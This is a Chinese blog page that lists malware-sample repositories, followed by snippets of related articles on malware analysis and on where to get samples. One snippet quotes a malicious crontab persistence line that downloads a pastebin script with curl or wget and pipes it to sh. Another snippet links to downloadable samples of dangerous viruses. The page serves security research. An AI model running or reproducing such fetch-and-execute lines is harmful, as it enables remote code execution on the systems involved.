病毒样本的数据库

最新推荐文章于 2025-03-06 14:43:15 发布
最新推荐文章于 2025-03-06 14:43:15 发布
阅读量3.1k 收藏 16
点赞数 1
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38858749/article/details/109511414
版权

https://bazaar.abuse.ch/browse/

https://www.virustotal.com/gui/home/search

https://www.malware-traffic-analysis.net/2021/05/24/index2.html

资源分享·病毒样本下载资源分享
不忘初心,护天下安全!
04-23 1万+
一、微步云沙箱 微步在线云沙箱https://s.threatbook.cn/ 使用病毒sha256即可寻找病毒样本;该站点也可上传可疑文件/可疑URL地址到沙箱中,进行分析 。 以永恒之蓝为例,样本sha256是:ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa 下载样本或流量监控,需要消耗积分: 二、AnyRun Interactive Online Malware Analysis Sandbox.
linux勒索病毒分析,永恒之蓝的勒索病毒tasksche.exe样本分析
weixin_32103009的博客
05-13 2525
内容:分析病毒结构,写出病毒如何利用漏洞进行攻击,详细剖析勒索病毒的运行过程,使用了什么加密算法,调用了什么系统API。进阶:中了该勒索病毒,怎么恢复数据样本分析首先是看下病毒样本的哈希值图片.png查壳信息,win32程序无壳:图片.png载入IDA后,先查看字符串,看到有RSA和AES,猜测之后会使用这两种加密方式:图片.png用IDA的findcrypto插件,找到了AES算法的特征:图片....
病毒样本
GodsLeft的专栏
05-26 4880
crontab可疑行 # crontab脚本,删掉后会自动重写 */23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh 查看其中的qbbSdzZd文件 > wget https://pastebin.com/raw/qbbS...
incaseformat蠕虫病毒样本分析
0leg的博客
01-15 2219
@[TOC]incaseformat蠕虫病毒样本分析 前言 2021年1月13日,incaseformat病毒在全网集中爆发,中毒用户C盘以外所有文件被删除。该病毒会格式化系统盘外的分区及删除数据,感染后会通过U盘进行传播,传播性强,隐蔽性高,危害性大。 安全工程师在该事件首次报告的逆向分析中,推测病毒程序制作存在错误,导致其爆发时间推迟到今年1月13日。而同行厂商也在后续报告中表明一致观点。但是,通过火绒威胁情报系统以及样本分析,工程师再次对病毒深度溯源发现,该病毒蛰伏至今才爆发,或为攻击者的精心策划。
【移动样本分析】Android锁机病毒分析,从零基础到精通,收藏这篇就够了!
喜欢Python编程的程序员柚柚呀
03-06 678
system/app目录:存放着stk3.apk文件,提示只读,需要修改 system 目录属性:mount -o remount, rw /system/,删除该文件;/data/data/zs.ip.proxy目录 和 /data/data/com.android.stk3目录:存放着两个文件的相关配置数据等信息,删除这两个文件;自此解锁完成,秒抢红包这个程序包含两层锁,密码分别为69435753和8985,但第一层锁解锁密码需要根据生成的随机数判断,密码样式为:随机数+8985。
介绍一个可以轻松下载病毒样本数据库
热门推荐
ybdesire的专栏
09-30 3万+
引入 病毒样本有一些知名的数据集,但一般这些数据集中的样本都比较老,并且申请这些数据集的流程复杂,耗时长。有的数据集只有meta信息,没有完整的样本。 而病毒样本又是各大安全公司的资产,研究者也不会轻易拿到新样本。 所以病毒样本的收集是比较麻烦的。 MalwareBazaar Database 从如下介绍,可以看出,MalwareBazaar数据库是与安全产商合作后,构建的一个公开的病毒样本数据库。 MalwareBazaar is a project operated by abuse.ch. The p
恶意网址virus.html,恶意样本查找
weixin_30803191的博客
06-16 1055
by Kungen@CyberSword想要查找恶意样本,首先要知道查找样本所需的基本信息,包括病毒名称、样本文件名、HASH值。对于最新发现的病毒,SECURELIST、VirusTotal网站会第一时间放出病毒样本的分析报告,这些分析报告中包含我们查找样本所需要的信息,以红色十月(Red October)病毒样本为例:SECURELIST上关于“红色十月”的分析文章中包含了样本文件名以及对应...
病毒样本大家请看啊
机器猫的专栏
09-13 1014
   
病毒样本分析学习一
weixin_45299049的博客
10-01 1741
简单的一次静态病毒样本分析
推荐一些免费下载恶意样本的网站
信息安全
09-25 3234
前一阵微步下载样本开始收费,算是又断了一个很好的白嫖途径。目前工作需求是不定期获取一批不同家族样本,看了看微步基础会员每天5次的下载限制,我默默把微步网页点了X,选择其他网站进行白嫖。
数据库双机热备解决方案样本.doc
11-21
数据库双机热备作为一项成熟的技术方案,被广泛应用于这些领域以保障数据不因单点故障而中断,同时也支持数据的实时备份和恢复,以应对不可预见的风险和灾难。本文以医院的信息系统(HIS)为例,深入分析了传统双机...
计算机病毒数据库的数据挖掘研究.pdf
07-14
病毒数据库是通过收集和存储病毒样本数据,进而进行分析、挖掘和归类,最终达到预测未来病毒发展、制定应对策略的目的。这要求反病毒技术必须持续发展,以适应计算机技术的快速进步,从而有效遏制计算机病毒的危害...
“基于云的样本数据库动态维护方法专利”
根据上述论述,可以得出以下关于《一种基于云的样本数据库动态维护方法.pptx》的1500字中文描述: 《一种基于云的样本数据库动态维护方法.pptx》是奇智软件(北京)有限公司在2010年8月18日申请的发明专利。该专利...
获取病毒样本的途径
把梦想放飞在蓝色的天空里...
11-21 4867
相信很多朋友对于病毒逆向分析感兴趣,除了可以提高逆向能力之外,还提高与病毒的抗战能力,提高个人战斗力,但有些朋友可能不知道如何获取病毒样本,毕竟是业余玩家,不像杀软公司有很大的病毒监测能力和设备,监测捕获平台,还有那个传说中的云安全!因此这里分享一点个人获取病毒样本的途径,其实主要也就是几个网站而已。 1.论坛收集 在一些安全站点,比如卡饭病毒样本版块: http://bbs.kafan.c
病毒样本大家请看啊 图2 卡巴查杀图表
机器猫的专栏
09-13 747
 
分享几个病毒分析检测网址
weixin_30947043的博客
11-08 2197
1、在线病毒分析网站: 以下网站上传样本后,很快就会在网页上出报告的: (1)这个网址报告格式很简洁,我很喜欢:http://camas.comodo.com/ (2)这个网址的报告最全面,而且会真的把传上去的样本跑一遍:http://anubis.iseclab.org/?action=home (3)这两个很像是同一个网站:http://www.xandora.net/upload/ ...
介绍七种常见还危险的病毒(带样本
2301_78858007的博客
07-16 2067
简介:能够感染用户计算机bai系统中的.exe、.dll和.html文件,将自身加密以后缀加到目标文件中。样本(源文件):https://wwx.lanzoux.com/iJx4njrpz1c / https://wwx.lanzoui.com/iYRNLwd8ldc。英文名称:Virus.Win32.Viking.A(标准) / Worm.Win32.Fujack.A(标准)英文名称:Net-Worm.Win32.Blaster.A(标准)/ Lovesan.A/ Msblast.A。
免费恶意样本资源
debugeeker的专栏
10-13 4175
恶意软件研究员经常要寻找恶意样本来获取威胁情报和开发防御方案。 下面是一些免费的恶意样本资源站,研究的人请下载到虚拟机上玩,后果自负! ANY.RUN https://app.any.run/submissions/ 每天更新,需要注册 Contagio Malware Dump http://contagiodump.blogspot.com/ 每天更新,下载后解压需要发邮件给博主获取密码 DAS MALWERK https://dasmalwerk.eu/ 更新频率不知,随便下载
Android病毒样本分析(2)
ireader135的博客
03-23 1330
1.基本信息 病毒名称: a.privacy.fakeccb.a[建设控件] 文件名称: BWM在线 文件MD5: E32377EE18BF0D853D5B45DEDFB6997D 文件包名: com.qqquanquan1031606149 危害属性: 恶意勒索   2.基本行为 程序启动后直接锁屏,以勒索用户   3.详细分析 1、在入口函数内启动服务 tr
数据安全数据集
最新发布
03-10
<think>好的,用户想要寻找与数据安全相关的数据集。我需要先确定用户的具体需求,可能他们需要这些数据集来进行研究、开发安全工具或者训练机器学习模型。首先,我应该回顾已有的知识库中的引用内容,看看是否有相关的资源推荐。 根据引用[3],提到了最佳实践包括了解数据集的元数据,并与其他开源项目如Sigma、Atomic Red Team和MITRE ATT&CK进行映射。这说明MITRE ATT&CK可能是一个重要的资源,因为它提供了关于网络攻击战术和技术的知识库,可能包含相关数据集的信息。此外,Sigma项目可能也涉及安全相关的数据格式或规则集,虽然不一定是数据集,但可以作为参考。 接下来,我应该考虑常见的数据安全数据集来源。例如,公开的安全漏洞数据库,如CVE(公共漏洞和暴露),NVD(国家漏洞数据库)等。这些数据库提供了详细的漏洞信息,适用于研究漏洞分析和防护措施。另外,恶意软件样本数据集也是数据安全的一部分,比如VirusShare或MalwareBazaar,但需要注意获取这些数据可能需要权限,并且处理时需要安全的环境。 还有,像Kaggle这样的平台可能有用户上传的安全相关数据集,比如入侵检测系统(IDS)的数据集,如KDD Cup 1999数据集,尽管它比较旧,但仍有参考价值。另外,UNSW-NB15是一个较新的网络流量数据集,适合用于机器学习模型的训练。 此外,企业或研究机构发布的数据集,如思科的威胁报告数据,或者高校的研究项目数据集,也可能有用。例如,MIT Lincoln实验室的DARPA入侵检测评估数据集,虽然较早,但被广泛引用。 另外,数据隐私相关的数据集,如匿名的用户数据或合成数据,用于测试数据匿名化技术或隐私保护算法,可能也是用户感兴趣的。例如,欧盟开放数据门户可能有相关资源。 在推荐数据集时,需要注意数据的时效性、许可协议(如引用[4]提到的LICENSE文件的重要性)以及数据格式是否符合用户的需求。同时,提醒用户遵守数据的使用条款,特别是在处理敏感或恶意软件数据时,确保符合法律和伦理要求。 最后,可能需要建议用户如何访问这些数据集,例如直接通过官方网站下载,或者通过学术论文中的链接获取。如果某些数据集需要申请或权限,也应告知用户相关流程。此外,结合引用[1]中提到的数据降维技术,可能可以指导用户在处理大规模安全数据集时的高效方法。</think>### 数据安全相关数据集推荐 以下是可用于数据安全研究、分析或模型训练的公开数据集及其特点: 1. **MITRE ATT&CK知识库** 提供网络攻击战术、技术、程序(TTPs)的标准化描述,适用于威胁检测规则开发[^3]。 - 类型:结构化知识库 - 访问:[MITRE ATT&CK官网](https://attack.mitre.org/) 2. **CVE(Common Vulnerabilities and Exposures)** 包含公开披露的网络安全漏洞信息,支持漏洞分析与防护研究。 $$ \text{CVE-ID格式示例:CVE-2024-12345} $$ - 类型:漏洞数据库 - 访问:[CVE官网](https://cve.mitre.org/) 3. **NVD(National Vulnerability Database)** 对CVE条目进行增强分析,提供漏洞严重性评分(CVSS)、修复建议等[^1]。 - 类型:漏洞数据库 - 访问:[NVD官网](https://nvd.nist.gov/) 4. **UNSW-NB15网络流量数据集** 包含模拟正常流量与攻击流量(如DoS、渗透攻击),适用于入侵检测模型训练。 - 类型:网络流量数据 - 访问:[UNSW数据集页面](https://www.unsw.adfa.edu.au/unsw-canberra-cyber/cybersecurity/ADFA-NB15-Datasets/) 5. **MalwareBazaar恶意软件样本库** 提供恶意软件样本的哈希值、行为分析报告,需遵守安全使用协议。 - 类型:恶意软件数据 - 访问:[MalwareBazaar官网](https://bazaar.abuse.ch/) 6. **Kaggle安全相关数据集** 如`Cyber Security Breaches`或`Malware Analysis Dataset`,包含实际攻击日志和元数据。 - 类型:多样化安全数据 - 访问:[Kaggle数据安全分类](https://www.kaggle.com/datasets?tags=13207-cybersecurity) --- ### 使用建议 - **合规性**:处理恶意软件数据时需在隔离环境中操作[^4]。 - **数据预处理**:可结合引用[1]中的降维技术处理高维日志数据。 - **工具集成**:通过Sigma等开源项目将数据映射到标准化检测规则。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值